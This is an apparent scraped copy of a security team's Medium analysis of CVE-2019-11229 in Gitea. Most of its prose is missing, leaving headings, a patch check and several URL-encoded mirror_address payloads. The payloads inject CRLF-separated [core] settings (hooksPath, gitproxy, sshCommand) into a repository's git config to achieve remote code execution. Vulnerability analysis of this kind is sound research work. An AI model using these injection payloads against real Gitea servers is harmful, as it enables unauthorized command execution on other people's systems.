Analysis of CVE-2019–11229 — From Git Config to RCE

Knownsec 404 team
Jul 24 · 7 min read

Patch Analysis

if !repo.IsMirror {
ctx.NotFound("", nil)
return
}

Control the Gitconfig

mirror_address=https%3A%2F%2Ftest%3A%40github.com%2FLoRexxar%2Ftest_for_gitea.git"""%0d%0a[core]%0d%0atest=/tmp%0d%0aa="""

Further Exploitation

Match the Githook Path RCE via Writing Files

mirror_address=https%3A%2F%2Fgithub.com%2FLoRexxar%2Ftest_for_gitea.git"""%0d%0a[core]%0d%0ahooksPath=/tmp%0d%0aa="""
/data/tmp/local-repo/{repo_id}

Implement RCE by Controlling Git Config

gitProxy

[core]
gitproxy = calc.exe

sshCommand

mirror_address=https%3A%2F%2Ftest%3A%40github.com%2FLoRexxar%2Ftest_for_gitea.git"""%0d%0a[core]%0d%0asshCommand=calc.exe%0d%0aa="""
&mirror_address=https%3A%2F%2Ftest%3A%40github.com%2FLoRexxar%2Ftest_for_gitea.git"""%0d%0a[core]%0d%0asshCommand="touch 2333"%0d%0aa="""

Conclusion

About Knownsec & 404 Team

Knownsec 404 team

Written by

404 Team, the core team from a well-known security company Knowsec in China. Twitter:@seebug_team Youtube: @404team knownsec Email:zoomeye@knownsec.com

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade